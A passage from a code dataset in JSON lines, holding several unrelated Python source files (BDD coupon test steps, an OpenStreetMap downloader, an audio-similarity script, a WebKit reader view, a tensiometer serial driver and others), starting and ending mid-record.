bdd_util.assert_api_call_success(response)\n\n@when(u\"{user}批量发优惠券\")\ndef step_impl(context, user):\n data = json.loads(context.text)[0]\n coupon_rule_name = data.get('coupon_name', '')\n count = data.get('count', 0)\n coupon_rule_id = 0\n if coupon_rule_name:\n coupon_rule_id = CouponRule.objects.get(owner_id=context.webapp_owner_id, name=coupon_rule_name).id\n args = {}\n args['coupon_rule_id'] = coupon_rule_id\n args['pre_person_count'] = count\n\n url = \"/mall2/api/issuing_coupons_record/?_method=put\"\n if data['modification_method'] == '给选中的人发优惠券(已取消关注的除外)':\n # args['member_id'] = json.dumps([m.id for m in Member.objects.filter(id__in=context.member_ids) if m.is_subscribed == 1])\n not_subscribe_member_ids = [m.id for m in Member.objects.filter(id__in=context.member_ids) if m.is_subscribed == 0]\n subscribe_member_ids = context.member_ids\n subscribe_member_ids = [ int(id) for id in subscribe_member_ids]\n for member_id in not_subscribe_member_ids:\n subscribe_member_ids.remove(member_id)\n args['member_id'] = json.dumps(subscribe_member_ids)\n context.member_ids = args['member_id']\n elif data['modification_method'] == '给筛选出来的所有人发优惠券(已取消关注的除外)':\n response = context.client.get('/member/api/member_list/?count_per_page=999999999999'+context.filter_str)\n member_ids = []\n for item in json.loads(response.content)['data']['items']:\n member_ids.append(item[\"id\"])\n args['member_id'] = json.dumps([m.id for m in Member.objects.filter(id__in=member_ids) if m.is_subscribed == 1])\n context.member_ids = args['member_id']\n if not coupon_rule_name:\n return\n response = context.client.post(url, args)\n bdd_util.assert_api_call_success(response)\n\n@then(u\"{user}获得发送提示您将为'{member}'发放优惠券\")\ndef step_impl(context, user, member):\n query_hex = byte_to_hex(member)\n member = Member.objects.get(webapp_id=context.webapp_id, username_hexstr=query_hex)\n bdd_util.assert_list([member.id], json.loads(context.member_ids))\n\n@then(u\"{user}获得发送提示您将为'{count}'人发放优惠券\")\ndef step_impl(context, user, count):\n if str(len(json.loads(context.member_ids))) != count:\n raise\n\n@then(u\"{user}获得选择优惠券列表\")\ndef step_impl(context, user):\n expected = json.loads(context.text)\n url = \"/mall2/api/issuing_coupons_filter/?filter_type=coupon&member_count=%s\" % str(len(json.loads(context.member_ids)))\n response = context.client.get(url)\n coupon_rules = json.loads(response.content)['data']['items']\n\n actual = []\n for coupon_rule in coupon_rules:\n rule = {}\n rule[\"name\"] = coupon_rule[\"name\"]\n rule[\"type\"] = \"单品券\" if coupon_rule[\"limit_product\"] else \"全店通用券\"\n rule[\"money\"] = coupon_rule[\"money\"]\n rule[\"limit_counts\"] = \"不限\" if coupon_rule[\"limit_counts\"] == -1 else coupon_rule[\"limit_counts\"]\n rule[\"start_date\"] = coupon_rule[\"start_time\"]\n rule[\"end_date\"] = coupon_rule[\"end_time\"]\n rule[\"is_select\"] = 'true' if coupon_rule[\"has_remained\"] else 'false'\n actual.append(rule)\n\n for item in expected:\n item[\"start_date\"] = \"{} 00:00\".format(bdd_util.get_date_str(item[\"start_date\"]))\n item[\"end_date\"] = \"{} 00:00\".format(bdd_util.get_date_str(item[\"end_date\"]))\n bdd_util.assert_list(actual, expected)\n\n# @Then(u\"{user}能获取会员等级列表\")\n# def step_impl(context, user):\n# \tif hasattr(context, 'client'):\n# \t\tcontext.client.logout()\n# \tcontext.client = bdd_util.login(user)\n# \tclient = context.client\n# \tuser = UserFactory(username=user)\n# \tjson_data = json.loads(context.text)\n# \tresponse = context.client.get('/webapp/user_center/grades/')\n# \tmember_grades = response.context['member_grades']\n# \t#context.tc.assertEquals(len(member_grades), len(json_data))\n# \tresponse_data = []\n# \tfor grade in member_grades:\n# \t\tdata_dict = {}\n# \t\tdata_dict['name'] = grade.name\n# \t\tdata_dict['shop_discount'] = str(grade.shop_discount)+\"%\"\n# \t\tif grade.is_auto_upgrade:\n# \t\t\tdata_dict['upgrade'] = u\"自动升级\"\n# \t\telse:\n# \t\t\tdata_dict['upgrade'] = u\"不自动升级\"\n# \t\tresponse_data.append(data_dict)\n\n# \tbdd_util.assert_list(response_data, json_data)\n\n# def _add_member_grade(context, user):\n# \tif hasattr(context, 'client'):\n# \t\tcontext.client.logout()\n# \tcontext.client = bdd_util.login(user)\n# \tclient = context.client\n# \tuser = UserFactory(username=user)\n# \tjson_data = json.loads(context.text)\n# \tfor content in json_data:\n# \t\tif content['upgrade'] == u'不自动升级':\n# \t\t\tcontent['is_auto_upgrade'] = 0\n# \t\telse:\n# \t\t\tcontent['is_auto_upgrade'] = 1\n# \t\t\tcontent['upgrade_lower_bound'] = int(content['shop_discount'].replace('%',''))\n# \t\tcontent['shop_discount'] = content['shop_discount'].replace('%','')\n# \t\tif MemberGrade.objects.filter(name=content['name'], webapp_id=user.get_profile().webapp_id).count() == 0:\n# \t\t\tresponse = context.client.post('/webapp/user_center/grade/create/', content)\n\n# @When(u\"{user}添加会员等级\")\n# def step_impl(context, user):\n# \t_add_member_grade(context, user)\n\n# @Given(u\"{user}添加会员等级\")\n# def step_impl(context, user):\n# \t_add_member_grade(context, user)\n\n# @When(u\"{user}更新会员等级{name}\")\n# def step_impl(context, user, name):\n# \tif hasattr(context, 'client'):\n# \t\tcontext.client.logout()\n# \tcontext.client = bdd_util.login(user)\n# \tclient = context.client\n# \tuser = UserFactory(username=user)\n# \tjson_data = json.loads(context.text)\n# \tif name.startswith(\"'\") and name.endswith(\"'\"):\n# \t\tname = name.replace(\"'\",\"\")\n# \tgrade = MemberGrade.objects.get(webapp_id=user.get_profile().webapp_id, name=name)\n# \tcontext.tc.assertEquals(name, grade.name)\n# \tfor content in json_data:\n# \t\tif content['upgrade'] == u'不自动升级':\n# \t\t\tcontent['is_auto_upgrade'] = 0\n# \t\telse:\n# \t\t\tcontent['is_auto_upgrade'] = 1\n# \t\t\tcontent['upgrade_lower_bound'] = int(content['shop_discount'].replace('%',''))\n# \t\tif content.has_key('integral'):\n# \t\t\tintegral = content['integral']\n# \t\t\tif integral.find('%') > 0:\n# \t\t\t\tintegral = integral.replace('%','')\n# \t\t\tcontent['usable_integral_percentage_in_order'] = integral\n# \t\tcontent['shop_discount'] = content['shop_discount'].replace('%','')\n# \t\tresponse = context.client.post('/webapp/user_center/grade/update/%d/' % grade.id, content)\n\n\n# @When(u\"{user}删除会员等级{name}\")\n# def step_impl(context, user, name):\n# \tif hasattr(context, 'client'):\n# \t\tcontext.client.logout()\n# \tcontext.client = bdd_util.login(user)\n# \tclient = context.client\n# \tuser = UserFactory(username=user)\n# \tjson_data = json.loads(context.text)\n\n# \tgrade = MemberGrade.objects.get(webapp_id=user.get_profile().webapp_id, name=name)\n# \tcontext.tc.assertEquals(name, grade.name)\n\n# \tresponse = context.client.get('/webapp/user_center/grade/delete/%d/' % grade.id)","repo_name":"chengdg/weizoom","sub_path":"weapp/features/steps/member_grade_steps.py","file_name":"member_grade_steps.py","file_ext":"py","file_size_in_byte":11927,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"20283164208","text":"\nclass FloatRange:\n def __init__(self, start, stop, step, precision=8):\n self.value = start\n self.stop = stop\n self.step = step\n self.precision = precision\n\n def __iter__(self):\n return self\n\n def __next__(self):\n value = self.value\n if self.step > 0 and value >= self.stop:\n raise StopIteration()\n if self.step < 0 and value <= self.stop:\n raise StopIteration()\n\n self.value = round(self.value + self.step, self.precision)\n return value\n\n\nif __name__ == \"__main__\":\n n = 1000\n for i, epsilon in enumerate([1.0 - k / n for k in range(n + 1)]):\n print(i, epsilon)\n\n for i, epsilon in enumerate(FloatRange(1.0, 0.0, -1/n)):\n print(i, epsilon)\n","repo_name":"ManuelWiese/TicTacToe","sub_path":"utils/FloatRange.py","file_name":"FloatRange.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"70162023594","text":"#Always start you game with this base.\nimport pygame, sys\nfrom pygame.locals import *\n\npygame.init()\n\nwhile True:\n\tfor event in pygame.event.get():\n\t\tif event.type == QUIT:\n\t\t\tpygame.quit()\n\t\t\tsys.exit()","repo_name":"StormCode3322/-TowerDefence","sub_path":"core/PyGame_/Game Loop Template.py","file_name":"Game Loop Template.py","file_ext":"py","file_size_in_byte":203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33369131890","text":"\"\"\"Download OpenStreetMap data for each case study according to their\narea of interest using the Overpass API, and pre-process input data\nto shapefiles or GeoTIFF.\n\"\"\"\n\nimport os\n\nimport geopandas as gpd\nimport overpass\nfrom shapely.geometry import Polygon, shape\nfrom tqdm import tqdm\n\nfrom generate_aoi import reproject_geom\nfrom metadata import City, CITIES\n\nOSM_FEATURES = {\n 'highway': 'roads.shp',\n 'building': 'buildings.shp',\n 'leisure': 'leisure.shp',\n 'natural': 'natural.shp',\n 'landuse': 'landuse.shp'\n}\n\n\ndef ways_to_polygons(ways):\n \"\"\"Polygon geometry type doesn't exist in the OSM database.\n This function convert the closed `ways` geometries of a given\n GeoDataFrame to the polygon geometry type.\n \"\"\"\n # Only valid geometries\n ways = ways[ways.is_valid]\n # Only geometries with at least 3 nodes\n ways = ways[ways.geometry.map(\n lambda x: len(x.coords) >= 4\n )]\n ways.geometry = ways.geometry.map(\n lambda x: Polygon(x)\n )\n return ways\n\n\nclass Downloader():\n \"\"\"OpenStreetMap data downloader.\"\"\"\n\n def __init__(self, aoi, epsg, dst_dir):\n \"\"\"Initialize an instance of the overpass API\n for a given case study.\n \"\"\"\n self.aoi = aoi\n self.epsg = epsg\n self.dst_dir = dst_dir\n self.api = overpass.API()\n self.bbox = self.get_bbox()\n\n def get_bbox(self):\n \"\"\"Get bounding box as a formatted string, as expected\n by the overpass API.\n \"\"\"\n aoi = reproject_geom(\n self.aoi, src_epsg=self.epsg, dst_epsg=4326)\n xmin, ymin, xmax, ymax = [round(coord, 3) for coord in aoi.bounds]\n bbox = '({ymin},{xmin},{ymax},{xmax})'\n return bbox.format(xmin=xmin, ymin=ymin, xmax=xmax, ymax=ymax)\n\n def get_feature(self, key):\n \"\"\"Get all OSM features which have a non-null value for\n a given key. Overpass response is returned as a GeoDataFrame.\n \"\"\"\n query = overpass.WayQuery('[{}]{}'.format(key, self.bbox))\n response = self.api.Get(query)\n features = gpd.GeoDataFrame.from_features(response)\n features.crs = {'init': 'epsg:4326'}\n features = features[['geometry', key]]\n features = features[features.is_valid]\n features = features[features.geometry.type == 'LineString']\n\n # Convert ways to polygons except for roads\n if key != 'highway':\n features = ways_to_polygons(features)\n\n return features\n\n\nif __name__ == '__main__':\n\n progress = tqdm(total=len(CITIES) * len(OSM_FEATURES))\n\n for city_name in CITIES:\n\n city = City(city_name)\n dst_dir = os.path.join(city.intermediary_dir, 'osm')\n os.makedirs(dst_dir, exist_ok=True)\n\n osm = Downloader(\n aoi=shape(city.aoi),\n epsg=city.epsg,\n dst_dir=dst_dir\n )\n\n for key, filename in OSM_FEATURES.items():\n\n features = osm.get_feature(key)\n features = features[features.is_valid]\n features = features.to_crs(city.crs)\n features = features[features.intersects(shape(city.aoi))]\n geoms = features.intersection(shape(city.aoi))\n features = features.assign(geometry=geoms)\n output_f = os.path.join(dst_dir, filename)\n features.to_file(output_f)\n progress.update(1)\n\n progress.close()\n","repo_name":"yannforget/builtup-classification-osm","sub_path":"src/download_osm.py","file_name":"download_osm.py","file_ext":"py","file_size_in_byte":3401,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"37147242264","text":"import time\nfrom enum import Enum\nimport numpy as np\nimport librosa\nimport Audio\n\n# wavファイルのリストのパス\nPATH_LIST = \"wav_list.txt\"\n\n# 自動でリサンプリングされるときのサンプリング周波数\nDEFAULT_FS = 44100\n\n# 特徴量の種類\nclass Feature_Types(Enum):\n SPECTRUM = 1\n SPECTRUM_CENTROID = 2\n MFCC = 3\n\n# 使用する特徴量の種類\nfeature_type = Feature_Types.SPECTRUM_CENTROID\n\n# 処理時間計測開始\nstart = time.time()\n\n# (1) wavファイル読み込み\nprint(\"#1 [Wav files read]\")\n\n# wavファイルのパスを読み込み、リストに格納\nwith open(PATH_LIST) as f:\n path_list = [line.strip() for line in f.readlines()] # 改行削除\n\n# 各wavファイルの振幅データ列とサンプリング周波数を取得し、リストに格納\nx_and_fs_list = []\nfor path in path_list:\n x, fs = librosa.load(path, DEFAULT_FS)\n x_and_fs_list.append((x, fs))\n\n# 読み込んだwavファイルのパスを一覧表示\nprint(\"> | {} : {}\".format(\"Index\", \"Path\"))\nfor index in range(len(path_list)):\n print(\"> | {} : {}\".format(index + 1, path_list[index]))\n\nprint(\"\")\n\n# (2) 特徴抽出\nprint(\"#2 [Feature extraction]\")\n\n# 使用する特徴量を表示\nprint(\"> Selected feature type : {}\".format(feature_type.name))\n\n# 使用する特徴量を抽出し、リストに格納\nfeature_list = []\nfor x_and_fs in x_and_fs_list:\n x = x_and_fs[0]\n fs = x_and_fs[1]\n if feature_type == Feature_Types.SPECTRUM:\n feature = np.abs(librosa.stft(x))\n elif feature_type == Feature_Types.SPECTRUM_CENTROID:\n feature = librosa.feature.spectral_centroid(x, fs)\n elif feature_type == Feature_Types.MFCC:\n feature = librosa.feature.mfcc(x, fs)\n feature_list.append(feature)\n\nprint(\"\")\n\n# (3) 類似度計算\nprint(\"#3 [Evaluation]\")\n\n# 比較の基準とする特徴量\nreference_index = 0\nreference_feature = feature_list[reference_index]\nprint(\"> Reference : {} ({})\".format(reference_index + 1, path_list[reference_index]))\n\n# 類似度を計算し、リストに格納\neval_list = []\nfor target_feature in feature_list:\n ac, wp = librosa.core.dtw(reference_feature, target_feature)\n eval = 1 - (ac[-1][-1] / np.array(ac).max())\n eval_list.append(eval)\n\n# 類似度を一覧表示\nprint(\"> | {} , {} : {}\".format(\"Reference\", \"Target\", \"Score\"))\nfor target_index in range(len(eval_list)):\n eval = eval_list[target_index]\n print(\"> | {} , {} : {}\".format(reference_index + 1, target_index + 1, round(eval, 4)))\n\nprint(\"\")\n\n# 処理時間計測終了\nend = time.time()\n# 処理時間表示\nprint(\"Total elapsed time : {}[sec]\".format(round(end - start, 4)))\n","repo_name":"Shun40/Wave-Comparator","sub_path":"script/comp.py","file_name":"comp.py","file_ext":"py","file_size_in_byte":2672,"program_lang":"python","lang":"ja","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"32876103219","text":"import random\n#1\n# y=int(input(\"enter year\"));\n# if(y%400==0 or y%4==0):\n# print(\"leap year\")\n\n\n#assignment3\n#1\n# for i in range(10):\n# h=int(input())\n# if(h>40):\n# print(\"bounus\",(h-40)*12)\n# else:\n# print(\"not do over time\");\n#2\n# def fac(n):\n# if(n==1):\n# return 1\n# return n*fac(n-1)\n# print(fac(5))\n#3\n#print(int(input(\"First=\"))**int(input(\"Second=\")))\n#5\n# n=int(input(\"enter\"))\n# sum=0\n# m=n\n# while(n!=0):\n# rem=n%10\n# sum=sum+rem*rem*rem\n# n=n//10\n# if(m==sum):\n# print(\"amstrong\")\n# else:\n# print(\"not\")\n#\ns=21\ni=1\nwhile s>0:\n if(s==1):\n break\n if(i%2!=0):\n while(1):\n try:\n p=int(input(\"enter no 1-4 \"))\n if(p>0 and p<=4 and p<=s):\n s=s-p\n break\n print(\"invailid\")\n except:\n print(\"invalid\")\n else:\n if s==10 :\n g=4\n elif s==9 or s==14 or s==18 or s==20 or s==17:\n g=3\n elif s==8 or s==13 or s==19 :\n g=2\n elif(s<=5):\n g=(s-1)\n else:\n g=(1)\n s-=g\n \n print(\"computer picked \",g)\n print(\"mathch stick= \",s)\n i+=1\nif(s==0):\n if(i%2!=0):\n print(\"win\")\n else:\n print(\"lose\")\nelse:\n if(i%2==0):\n print(\"win\")\n else:\n print(\"lose\")\n#13\n# a='123'\n# for i in a:\n# for j in a:\n# for k in a:\n# if i!=j!=k:\n# print(i,j,k)\n ","repo_name":"Joydeep-Kundu/Python-Projects","sub_path":"assignment/t2.py","file_name":"t2.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4980122645","text":"from flask import Blueprint\n\nfrom invenio.base.signals import webcoll_after_webpage_cache_update\nfrom invenio.modules.communities.signals import after_save_collection, \\\n pre_curation, post_curation\n\nfrom .receivers import invalidate_jinja2_cache, pre_curation_reject_listener, \\\n post_curation_reject_listener, make_public_restricted, \\\n update_provisional_query\n\n\nblueprint = Blueprint(\n 'lwdaap_communities',\n __name__,\n static_folder=\"static\",\n template_folder=\"templates\",\n)\n\n\n@blueprint.before_app_first_request\ndef register_receivers():\n \"\"\"\n Setup signal receivers for communities module.\n \"\"\"\n webcoll_after_webpage_cache_update.connect(invalidate_jinja2_cache)\n after_save_collection.connect(invalidate_jinja2_cache)\n after_save_collection.connect(make_public_restricted)\n after_save_collection.connect(update_provisional_query)\n pre_curation.connect(pre_curation_reject_listener)\n post_curation.connect(post_curation_reject_listener)\n","repo_name":"aeonium/lw-daap","sub_path":"lw_daap/modules/communities/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1915566959","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jul 26 09:43:23 2022\n\n@author: sangyoon\n\"\"\"\n\nimport sys \nfrom collections import deque\ninput = sys.stdin.readline \n\n\ndef findPath(start, target):\n visited = [False for _ in range(10000)] \n queue = deque([(start, \"\")])\n \n while queue:\n node, p = queue.popleft()\n if node == target:\n return p\n \n newNode = int(str(node)[1:] + str(node)[0])\n if not visited[newNode]:\n visited[newNode] = True\n newPath = p + \"L\"\n queue.append([newNode, newPath])\n \n newNode = int(str(node)[-1] + str(node)[:-1])\n if not visited[newNode]:\n visited[newNode] = True\n newPath = p + \"R\"\n queue.append([newNode, newPath])\n \n newNode = (node * 2) % 10000\n if not visited[newNode]:\n visited[newNode] = True\n newPath = p + \"D\"\n queue.append([newNode, newPath])\n\n if node != 0:\n newNode = node - 1\n else:\n newNode = 9999\n if not visited[newNode]:\n visited[newNode] = True\n newPath = p + \"S\"\n queue.append([newNode, newPath])\n \n\nT = int(input())\n\nfor _ in range(T):\n a, b = map(int, input().split())\n print(findPath(a, b))\n \n ","repo_name":"sangyun0904/BOJ_python_solve","sub_path":"baekjoon/DFS_BFS/baekjoon9019.py","file_name":"baekjoon9019.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"30792824650","text":"import logging\n\nimport gi\ngi.require_version('WebKit2', '4.0')\ngi.require_version('Gtk', '3.0')\n\nfrom gi.repository import GLib\nfrom gi.repository import WebKit2\nfrom gi.repository import Gtk\nfrom gi.repository import Gdk\nfrom gi.repository import GObject\n\nclass _WebView(WebKit2.WebView):\n\n __gsignals__ = {\n 'touch-change-page': (GObject.SignalFlags.RUN_FIRST, GObject.TYPE_NONE,\n ([bool])),\n 'scrolled': (GObject.SignalFlags.RUN_FIRST, GObject.TYPE_NONE,\n ([float])),\n 'scrolled-top': (GObject.SignalFlags.RUN_FIRST, GObject.TYPE_NONE,\n ([])),\n 'scrolled-bottom': (GObject.SignalFlags.RUN_FIRST, GObject.TYPE_NONE,\n ([])),\n 'selection-changed': (GObject.SignalFlags.RUN_FIRST, GObject.TYPE_NONE,\n ([bool])),\n }\n\n def __init__(self, **kwargs):\n cm = WebKit2.UserContentManager()\n\n cm.register_script_message_handler('scrolled');\n cm.connect('script-message-received::scrolled',\n lambda cm, result: self.emit('scrolled',\n result.get_js_value().to_double()))\n\n cm.register_script_message_handler('scrolled_top');\n cm.connect('script-message-received::scrolled_top',\n lambda cm, result: self.emit('scrolled-top'))\n\n cm.register_script_message_handler('scrolled_bottom');\n cm.connect('script-message-received::scrolled_bottom',\n lambda cm, result: self.emit('scrolled-bottom'))\n\n cm.register_script_message_handler('selection_changed');\n cm.connect('script-message-received::selection_changed',\n lambda cm, result: self.emit('selection-changed',\n result.get_js_value().to_boolean()))\n\n cm.add_script(WebKit2.UserScript('''\n window.addEventListener(\"scroll\", function(){\n var handler = window.webkit.messageHandlers.scrolled;\n handler.postMessage(window.scrollY);\n });\n document.addEventListener(\"selectionchange\", function() {\n var handler = window.webkit.messageHandlers.selection_changed;\n handler.postMessage(window.getSelection() != '');\n });\n ''',\n WebKit2.UserContentInjectedFrames.ALL_FRAMES,\n WebKit2.UserScriptInjectionTime.START, None, None))\n\n cm.add_style_sheet(WebKit2.UserStyleSheet('''\n html { margin: 50px; }\n body { overflow: hidden; }\n ''',\n WebKit2.UserContentInjectedFrames.ALL_FRAMES,\n WebKit2.UserStyleLevel.USER, None, None))\n\n WebKit2.WebView.__init__(self, user_content_manager=cm, **kwargs)\n self.get_settings().set_enable_write_console_messages_to_stdout(True)\n\n def do_context_menu (self, context_menu, event, hit_test_result):\n # nope nope nope nopenopenopenenope\n return True\n\n def setup_touch(self):\n self.get_window().set_events(\n self.get_window().get_events() | Gdk.EventMask.TOUCH_MASK)\n self.connect('event', self.__event_cb)\n\n def __event_cb(self, widget, event):\n if event.type == Gdk.EventType.TOUCH_BEGIN:\n x = event.touch.x\n view_width = widget.get_allocation().width\n if x > view_width * 3 / 4:\n self.emit('touch-change-page', True)\n elif x < view_width * 1 / 4:\n self.emit('touch-change-page', False)\n\n def _execute_script_sync(self, js):\n '''\n This sad function aims to provide synchronous script execution like\n WebKit-1.0's WebView.execute_script() to ease porting.\n '''\n res = [\"0\"]\n\n def callback(self, task, user_data):\n Gtk.main_quit()\n result = self.run_javascript_finish(task)\n if result is not None:\n res[0] = result.get_js_value().to_string()\n\n self.run_javascript(js, None, callback, None)\n Gtk.main()\n return res[0]\n\n def get_page_height(self):\n '''\n Gets height (in pixels) of loaded (X)HTML page.\n This is done via javascript at the moment\n '''\n return int(self._execute_script_sync('''\n (function(){\n if (document.body == null) {\n return 0;\n } else {\n return Math.max(document.body.scrollHeight,\n document.body.offsetHeight,\n document.documentElement.clientHeight,\n document.documentElement.scrollHeight,\n document.documentElement.offsetHeight);\n };\n })()\n '''))\n\n def add_bottom_padding(self, incr):\n '''\n Adds incr pixels of margin to the end of the loaded (X)HTML page.\n '''\n self.run_javascript('document.body.style.marginBottom = \"%dpx\";' % (incr + 50))\n\n def highlight_next_word(self):\n '''\n Highlight next word (for text to speech)\n '''\n self.run_javascript('highLightNextWord();')\n\n def go_to_link(self, id_link):\n self.run_javascript('window.location.href = \"%s\";' % id_link)\n\n def get_vertical_position_element(self, id_link):\n '''\n Get the vertical position of a element, in pixels\n '''\n # remove the first '#' char\n id_link = id_link[1:]\n return int(self._execute_script_sync('''\n (function(id_link){\n var obj = document.getElementById(id_link);\n var top = 0;\n if (obj.offsetParent) {\n while(1) {\n top += obj.offsetTop;\n if (!obj.offsetParent) {\n break;\n };\n obj = obj.offsetParent;\n };\n } else if (obj.y) {\n top += obj.y;\n }\n return top;\n })(\"%s\")\n ''' % id_link))\n\n def scroll_to(self, to):\n '''\n Set the vertical position in a document to a value in pixels.\n '''\n self.run_javascript('window.scrollTo(-1, %d);' % to)\n\n def scroll_by(self, by):\n '''\n Modify the vertical position in a document by a value in pixels.\n '''\n self.run_javascript('''\n (function(by){\n var before = window.scrollY;\n window.scrollBy(0, by);\n if (window.scrollY == before) {\n if (by < 0) {\n var handler = window.webkit.messageHandlers.scrolled_top;\n handler.postMessage(window.scrollY);\n } else if (by > 0) {\n var handler = window.webkit.messageHandlers.scrolled_bottom;\n handler.postMessage(window.scrollY);\n }\n }\n }(%d))\n ''' % by)\n","repo_name":"sugarlabs/read-activity","sub_path":"epubview/widgets.py","file_name":"widgets.py","file_ext":"py","file_size_in_byte":7027,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"18591939599","text":"# encoding:utf-8\nimport os\nfrom logging import getLogger\n\nimport tweepy\n\nlogger = getLogger(\"bot\").getChild(__name__)\n\n\nclass Mytwitterer():\n counter = 0\n\n def __init__(self, CK, CS, AT, AS):\n if not (Mytwitterer.counter):\n self.__CK = CK\n self.__CS = CS\n self.__AT = AT\n self.__AS = AS\n self.get_oauth()\n Mytwitterer.counter += 1\n\n def get_oauth(self):\n auth = tweepy.OAuthHandler(self.__CK, self.__CS)\n auth.set_access_token(self.__AT, self.__AS)\n self.__api = tweepy.API(auth)\n\n @property\n def api(self):\n return self.__api\n\n def search_list(self, id: str) -> list:\n try:\n listlist = []\n for i in self.api.lists_all(id):\n listlist.append(i.name)\n return listlist\n except Exception:\n logger.warning(\"cannot read list from twitter id.\")\n return None\n","repo_name":"NULL-header/twitterer","sub_path":"doc/twitterer.py","file_name":"twitterer.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"21914643650","text":"#!/usr/bin/env python\nr\"\"\"\nBands + DOS\n===========\n\nThis example shows how to compute the DOS and plot a\nband structure with DOS using two GSR files.\n\"\"\"\nfrom abipy.abilab import abiopen\nimport abipy.data as abidata\n\n# Open the file with energies computed on a k-path in the BZ\n# and extract the band structure object.\nwith abiopen(abidata.ref_file(\"si_nscf_GSR.nc\")) as nscf_file:\n nscf_ebands = nscf_file.ebands\n\n# Open the file with energies computed with a homogeneous sampling of the BZ\n# and extract the band structure object.\nwith abiopen(abidata.ref_file(\"si_scf_GSR.nc\")) as gs_file:\n gs_ebands = gs_file.ebands\n\n#%%\n# Compute the DOS with the Gaussian method (use default values for\n# the broadening and the step of the linear mesh.\n\nedos = gs_ebands.get_edos()\n\n#%%\n# To plot bands and DOS with matplotlib use:\n\nnscf_ebands.plot_with_edos(edos, with_gaps=True, title=\"Si Electron bands + DOS\")\n\n#%%\n# For the plotly version use:\n\nnscf_ebands.plotly_with_edos(edos, with_gaps=True, title=\"Si Electron bands + DOS\")\n","repo_name":"abinit/abipy","sub_path":"abipy/examples/plot/plot_ebands_edos.py","file_name":"plot_ebands_edos.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"72"} +{"seq_id":"42525318738","text":"#!/usr/bin/env python\n'''\nPython script to interface with an RS485 UGT tensiometer using serial to RS485 converter.\n'''\nfrom io import TextIOWrapper\nimport os\nimport traceback\nimport time\nimport serial\nimport serial.tools.list_ports\n\n# CONFIG\nSAVE_TO_CSV = True\nCSV_FILE_PATH = \"tensiometer.csv\"\n\n# Measurement channel constants\nCHANNEL_SERVICE_1 = 1\nCHANNEL_TEMPERATURE = 2\nCHANNEL_PRESSURE = 3\nCHANNEL_SERVICE_2 = 4\n\nBUS_ADDR_ALL = 0 #Value of bus address for OP for all connected FRTs\n\n## Constants for tensiometer\nBIT_CONVERSION_FACTOR = 16384\nUGT_CONVERSION_FACTOR_32768 = 32768\nUGT_CONVERSION_FACTOR_31 = 31\n\n\ndef open_csv(csv_file_name):\n '''\n Create csv file and add headers\n '''\n # Check if file exist to add column headings\n if not os.path.isfile(csv_file_name):\n csv_fid = open(csv_file_name, 'w', encoding=\"utf-8\") # Open file for writing\n csv_fid.write(\"Timestamp,Temperature (Digital),Pressure (Digital),Temperature (C),Pressure (kPa),Suction (kPa)\\n\") # Allocate column names\n else:\n csv_fid = open(csv_file_name, 'a', encoding=\"utf-8\") # Open file for appending\n return csv_fid\n\n\ndef get_com_ports_list():\n '''\n Gets a list of comm ports\n '''\n return(sorted(serial.tools.list_ports.comports()))\n\n\ndef print_ports_list(ports_list):\n '''\n Prints the list of detected ports\n '''\n i = 0\n print(\"\\r\\nPlease select the port where tensiometer is connected to.\")\n for device, desc, hwid in ports_list:\n print(\"\\t{} ) {} - {} [{}]\".format(i, device, desc, hwid))\n i = i + 1\n print(\"\\t---\")\n print(\"\\t{} ) {}\".format(\"r\", \"Rescan ports\"))\n\n\ndef calculate_temperature_compensated_reference_pressure(temperature:float, p_0:float, c_t1:float, c_t2:float):\n '''\n Calculates temperature compensated reference pressure\n '''\n return c_t1 * temperature**2 + c_t2 * temperature + p_0\n\n\ndef calculate_tesion(pressure, p_compensated_ref):\n '''\n Calculate tension from temperature compensated reference and measured pressure\n '''\n return p_compensated_ref - pressure\n\nclass UGTTensiometer():\n '''\n Class object for tensiometer.\n '''\n\n # Class variables\n _ser = None # Reference to serial device tensiometer is attached to\n _serial_number = None # Serial number of tensiometer\n _temperature_bus_addr = None # Bus address for temperature\n _pressure_bus_addr = None # Bus address for pressure\n _c_t1:float # Temperature coefficient 1, C_t1, [kPa/C^2]\n _c_t2:float # Temperature coefficient 2, C_t2 [kPa/C]\n _p_0:float # Reference pressure at 0 degrees celsius [kPa]\n\n # FRT calibration values\n _calibration = None\n\n def __init__(self, ser:serial.Serial, serial_number:str, t1_coeff:float, t2_coeff:float, p0_ref:float, \\\n bus_temp:str=None, bus_pressure:str=None):\n if ser is not None:\n self.attach(ser)\n self._serial_number = serial_number\n self._c_t1 = t1_coeff\n self._c_t2 = t2_coeff\n self._p_0 = p0_ref\n self._temperature_bus_addr = bus_temp\n self._pressure_bus_addr = bus_pressure\n\n @staticmethod\n def configure_serial(ser:serial.Serial):\n '''\n Wrapper for configuration of serial object\n Parameters for the serial interface (UART) are 9600 8N1\n (9600 baud, 8 data bits, no parity, 1 stop bit)\n '''\n ser.baudrate = 9600\n ser.bytesize = serial.EIGHTBITS\n ser.parity = serial.PARITY_NONE\n ser.stopbits = serial.STOPBITS_ONE\n ser.timeout = 5\n if ser.isOpen() is False:\n ser.open()\n\n @staticmethod\n def send_command(ser:serial.Serial, message):\n '''\n Serial write wrapper to package command and flush before sending command.\n '''\n 